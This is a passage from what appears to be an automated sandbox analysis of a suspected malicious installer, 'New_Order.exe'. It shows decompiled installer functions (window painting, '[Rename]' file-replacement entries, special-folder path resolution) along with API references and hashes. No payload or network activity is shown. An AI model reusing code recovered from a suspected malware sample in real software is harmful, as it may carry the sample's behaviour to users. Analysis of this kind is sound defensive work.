				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                        0x0040100a
                                                                        0x00401039
                                                                        0x00401047
                                                                        0x0040104d
                                                                        0x00401051
                                                                        0x0040105b
                                                                        0x00401061
                                                                        0x00401064
                                                                        0x004010f3
                                                                        0x00401089
                                                                        0x0040108c
                                                                        0x004010a6
                                                                        0x004010bd
                                                                        0x004010cc
                                                                        0x004010cf
                                                                        0x004010d5
                                                                        0x004010d9
                                                                        0x004010e4
                                                                        0x004010ed
                                                                        0x004010ef
                                                                        0x004010ef
                                                                        0x00401100
                                                                        0x00401105
                                                                        0x0040110d
                                                                        0x00401110
                                                                        0x00401112
                                                                        0x00401118
                                                                        0x0040111f
                                                                        0x00401126
                                                                        0x00401130
                                                                        0x00401142
                                                                        0x00401156
                                                                        0x00401160
                                                                        0x00401165
                                                                        0x00401165
                                                                        0x00401110
                                                                        0x0040116e
                                                                        0x00000000
                                                                        0x00401178
                                                                        0x00401010
                                                                        0x00401013
                                                                        0x00401015
                                                                        0x0040101f
                                                                        0x0040101f
                                                                        0x00000000

                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32 ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextA.USER32(00000000,Lat Setup,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F$Lat Setup
                                                                        • API String ID: 941294808-173993723
                                                                        • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                        • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                                        • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                        • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405D66, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405D66(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c620 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
						_t53 = _t52 + 0x10;
						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405C4B(_t24 + _t46, 0x42c220, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405D37(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C90(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                        0x00405d66
                                                                        0x00405d6f
                                                                        0x00405d76
                                                                        0x00405d8a
                                                                        0x00405db2
                                                                        0x00405dbd
                                                                        0x00405dc1
                                                                        0x00405de1
                                                                        0x00405de8
                                                                        0x00405df2
                                                                        0x00405dff
                                                                        0x00405e04
                                                                        0x00405e09
                                                                        0x00405e0d
                                                                        0x00405e1c
                                                                        0x00405e1e
                                                                        0x00405e2b
                                                                        0x00405e2f
                                                                        0x00405eca
                                                                        0x00000000
                                                                        0x00405e45
                                                                        0x00405e52
                                                                        0x00405e76
                                                                        0x00405e7a
                                                                        0x00405e99
                                                                        0x00405e9d
                                                                        0x00405e9d
                                                                        0x00405e9f
                                                                        0x00405ea8
                                                                        0x00405eb3
                                                                        0x00405ebe
                                                                        0x00405ec4
                                                                        0x00000000
                                                                        0x00405ec4
                                                                        0x00405e7c
                                                                        0x00405e7f
                                                                        0x00405e8a
                                                                        0x00405e86
                                                                        0x00405e88
                                                                        0x00405e89
                                                                        0x00405e89
                                                                        0x00405e91
                                                                        0x00405e93
                                                                        0x00000000
                                                                        0x00405e93
                                                                        0x00405e5d
                                                                        0x00405e63
                                                                        0x00000000
                                                                        0x00405e63
                                                                        0x00405e2f
                                                                        0x00405e0d
                                                                        0x00405d8c
                                                                        0x00405d97
                                                                        0x00405da0
                                                                        0x00405da4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405da4
                                                                        0x00405ed5

                                                                        APIs
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                                        • GetShortPathNameA.KERNEL32 ref: 00405DA0
                                                                          • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                          • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                        • GetShortPathNameA.KERNEL32 ref: 00405DBD
                                                                        • wsprintfA.USER32 ref: 00405DDB
                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                                        • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                                        • GlobalFree.KERNEL32 ref: 00405EC4
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                                          • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\New_Order.exe,80000000,00000003), ref: 00405C94
                                                                          • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                        • String ID: %s=%s$[Rename]
                                                                        • API String ID: 2171350718-1727408572
                                                                        • Opcode ID: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                                                                        • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                                        • Opcode Fuzzy Hash: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                                                                        • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040618A, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebfc; // 0x7c930d
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f478;
				_t39 = 0x42e3c0;
				_t90 = 0x42e3c0;
				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3c0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E00406055(_t90,  *0x42f428);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004063D2(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f42c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4c4;
						if( *0x42f4c4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f424;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E0040618A(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E004060F7(_a4, _t39);
			}



























                                                                        0x0040618a
                                                                        0x0040618a
                                                                        0x0040618a
                                                                        0x00406190
                                                                        0x00406195
                                                                        0x00406197
                                                                        0x004061a6
                                                                        0x004061a6
                                                                        0x004061ae
                                                                        0x004061af
                                                                        0x004061b0
                                                                        0x004061b1
                                                                        0x004061b4
                                                                        0x004061bc
                                                                        0x004061be
                                                                        0x004061d5
                                                                        0x004061d8
                                                                        0x004061d8
                                                                        0x004063af
                                                                        0x004063af
                                                                        0x004063b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004061e5
                                                                        0x004061eb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004061f1
                                                                        0x004061f2
                                                                        0x004061f5
                                                                        0x004061f8
                                                                        0x004063a2
                                                                        0x004063ac
                                                                        0x004063ae
                                                                        0x004063ae
                                                                        0x004063a4
                                                                        0x004063a6
                                                                        0x004063a8
                                                                        0x004063a9
                                                                        0x004063a9
                                                                        0x00000000
                                                                        0x004063a2
                                                                        0x004061fe
                                                                        0x00406202
                                                                        0x00406212
                                                                        0x00406219
                                                                        0x0040621c
                                                                        0x00406224
                                                                        0x00406227
                                                                        0x0040622e
                                                                        0x0040622f
                                                                        0x00406232
                                                                        0x0040634f
                                                                        0x00406352
                                                                        0x00406382
                                                                        0x00406385
                                                                        0x0040638a
                                                                        0x0040638e
                                                                        0x0040638e
                                                                        0x00406393
                                                                        0x00406399
                                                                        0x0040639b
                                                                        0x00000000
                                                                        0x0040639b
                                                                        0x00406354
                                                                        0x00406357
                                                                        0x0040636c
                                                                        0x00406373
                                                                        0x00406359
                                                                        0x00406360
                                                                        0x00406360
                                                                        0x0040637b
                                                                        0x0040637e
                                                                        0x00406347
                                                                        0x00406348
                                                                        0x00406348
                                                                        0x00000000
                                                                        0x0040637e
                                                                        0x00406238
                                                                        0x0040623f
                                                                        0x00406241
                                                                        0x00406242
                                                                        0x0040625c
                                                                        0x0040625c
                                                                        0x00406263
                                                                        0x00406263
                                                                        0x0040626a
                                                                        0x0040626e
                                                                        0x0040626e
                                                                        0x0040626f
                                                                        0x00406271
                                                                        0x004062aa
                                                                        0x004062ad
                                                                        0x004062bd
                                                                        0x004062c0
                                                                        0x004062c8
                                                                        0x004062ce
                                                                        0x004062ce
                                                                        0x0040632d
                                                                        0x0040632d
                                                                        0x0040632f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004062d2
                                                                        0x004062d9
                                                                        0x004062da
                                                                        0x004062dc
                                                                        0x004062f6
                                                                        0x00406304
                                                                        0x0040630a
                                                                        0x0040630c
                                                                        0x0040632a
                                                                        0x0040632a
                                                                        0x0040632a
                                                                        0x00000000
                                                                        0x0040632a
                                                                        0x00406312
                                                                        0x0040631b
                                                                        0x0040631e
                                                                        0x00406324
                                                                        0x00406328
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406328
                                                                        0x004062de
                                                                        0x004062e1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004062f0
                                                                        0x004062f2
                                                                        0x004062f4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004062f4
                                                                        0x00000000
                                                                        0x0040632d
                                                                        0x004062b5
                                                                        0x00000000
                                                                        0x00406273
                                                                        0x0040628e
                                                                        0x00406293
                                                                        0x00406296
                                                                        0x00406336
                                                                        0x00406336
                                                                        0x0040633a
                                                                        0x00406342
                                                                        0x00406342
                                                                        0x00000000
                                                                        0x0040633a
                                                                        0x004062a0
                                                                        0x00406331
                                                                        0x00406331
                                                                        0x00406334
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406334
                                                                        0x00406271
                                                                        0x00406244
                                                                        0x00406248
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040624a
                                                                        0x0040624e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406250
                                                                        0x00406254
                                                                        0x00000000
                                                                        0x00406256
                                                                        0x00406256
                                                                        0x00000000
                                                                        0x00406256
                                                                        0x00406254
                                                                        0x004063b9
                                                                        0x004063c3
                                                                        0x004063cf
                                                                        0x004063cf
                                                                        0x00000000

                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 004062B5
                                                                        • GetWindowsDirectoryA.KERNEL32(GHFGHFGHFDGDFGDFg,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                                        • SHGetSpecialFolderLocation.SHELL32(00405256,7519EA30,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                                        • SHGetPathFromIDListA.SHELL32(7519EA30,GHFGHFGHFDGDFGDFg), ref: 00406312
                                                                        • CoTaskMemFree.OLE32(7519EA30), ref: 0040631E
                                                                        • lstrcatA.KERNEL32(GHFGHFGHFDGDFGDFg,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                                        • lstrlenA.KERNEL32(GHFGHFGHFDGDFGDFg,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00422448,7519EA30), ref: 00406394
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                        • String ID: GHFGHFGHFDGDFGDFg$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 717251189-3709218778
                                                                        • Opcode ID: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                                        • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                                        • Opcode Fuzzy Hash: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                                        • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004063D2, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004063D2(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                        0x004063d4
                                                                        0x004063dc
                                                                        0x004063f0
                                                                        0x004063f0
                                                                        0x004063f6
                                                                        0x00406403
                                                                        0x00406403
                                                                        0x00406404
                                                                        0x00406406
                                                                        0x0040640a
                                                                        0x0040640c
                                                                        0x00406415
                                                                        0x00406417
                                                                        0x00406431
                                                                        0x00406439
                                                                        0x00406439
                                                                        0x0040643e
                                                                        0x00406440
                                                                        0x00406442
                                                                        0x00406446
                                                                        0x00406447
                                                                        0x0040644a
                                                                        0x00406452
                                                                        0x00406454
                                                                        0x00406458
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040645e
                                                                        0x00406463
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406463
                                                                        0x00406468

                                                                        APIs
                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\New_Order.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                        • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\New_Order.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                        • CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                        Strings
                                                                        • *?|<>/":, xrefs: 0040641A
                                                                        • "C:\Users\user\Desktop\New_Order.exe" , xrefs: 0040640E
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: "C:\Users\user\Desktop\New_Order.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 589700163-3857985205
                                                                        • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                        • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                                        • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                        • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004041E2, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                        0x004041f4
                                                                        0x004042aa
                                                                        0x00000000
                                                                        0x004042aa
                                                                        0x00404205
                                                                        0x00404209
                                                                        0x00000000
                                                                        0x00404223
                                                                        0x00404223
                                                                        0x0040422c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040422e
                                                                        0x0040423a
                                                                        0x0040423d
                                                                        0x0040423d
                                                                        0x00404243
                                                                        0x00404249
                                                                        0x00404249
                                                                        0x00404255
                                                                        0x0040425b
                                                                        0x00404262
                                                                        0x00404265
